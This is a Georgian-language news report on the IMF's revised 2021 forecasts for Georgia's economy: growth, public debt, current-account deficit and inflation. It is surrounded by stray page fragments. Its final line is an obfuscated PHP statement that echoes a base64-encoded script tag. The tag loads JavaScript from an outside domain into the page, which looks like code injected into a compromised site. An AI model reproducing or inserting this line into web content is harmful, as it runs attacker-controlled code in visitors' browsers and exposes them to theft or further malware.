celsiusi
ავერსი შნაიდერი
საერთაშორისო სავალუტო ფონდმა საქართველოს მაკროეკონომიკური პროგნოზი განაახლა. IMF-ის მისიის ხელმძღვანელის, ჯეიმს ჯონის მიერ წარდგენილი ანგარიშის მიხედვით, ფონდი წელს საქათველოში 7.7%-იან ეკონომიკურ ზრდას პროგნოზირებს. ეს ფონდის წინა პროგნოზთან, ანუ 3.5%-თან შედარებით ორჯერ მეტია. პროგნოზის გადახედვა მოსალოდნელზე მაღალმა ეკონომიკურმა ზრდამ განაპირობა, რადგანაც აპრილში საქართველოში 44.8%-იანი, მაისში კი 25.8%-იანი ეკონომიკური ზრდა იყო.
 
სავალუტო ფონდის პროგნოზით წელს საქართველოს ეკონომიკის ზომა 56.9 მილიარდ ლარს მიაღწევს.
 
დღეს გამოქვეყნებული ანგარიშის თანახმად, 2022 წელს საქართველოს ეკონომიკა 5.8%-ით უნდა გაიზარდოს.
 
IMF-ის მსგავსად, ქვეყანაში 7.7%-იან ეკონომიკურ ზრდას მოელის წელს საქართველოს მთავრობაც. ბიუჯეტის კორექტირების პროექტში წლის მოსალოდნელ ზრდად სწორედ ეს მაჩვენებელია განსაზღვრული.
 
ეკონომიკური ზრდის გაუმჯობესებულ პარამეტრთან ერთად, IMF საქართველოს სხვა ეკონომიკურ პროგნოზებსაც აუმჯობესებს. კერძოდ, ფონდის შეფასებით, სახელმწიფო ვალის მშპ-სთან შეფარდება, რაც აქამდე 60.8%-ზე იყო ნავარაუდევი, 55.3%-მდე შემცირდება. 
 
გაუმჯობესებულია მიმდინარე ანგარიშის დეფიციტის პროგნოზიც, რომელიც მინუს 10.9%-ის ნაცვლად, მინუს 9.9% იქნება.
 
გაუარესებულია ინფლაციის მოლოდინი. თუკი სავალუტო ფონდი აქამდე საქართველოში 2021 წელს საშუალოდ 3.8%-იან ინფლაციას პროგნოზირებდა, ახალი ანგარიშის მიხედვით, წელს ქვეყანაში 7.3%-იანი საშუალო ინფლაცია იქნება, 2021 წლის ბოლოს კი წლიური ინფლაცია 9.4%-საც მიაღწევს.
1164
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");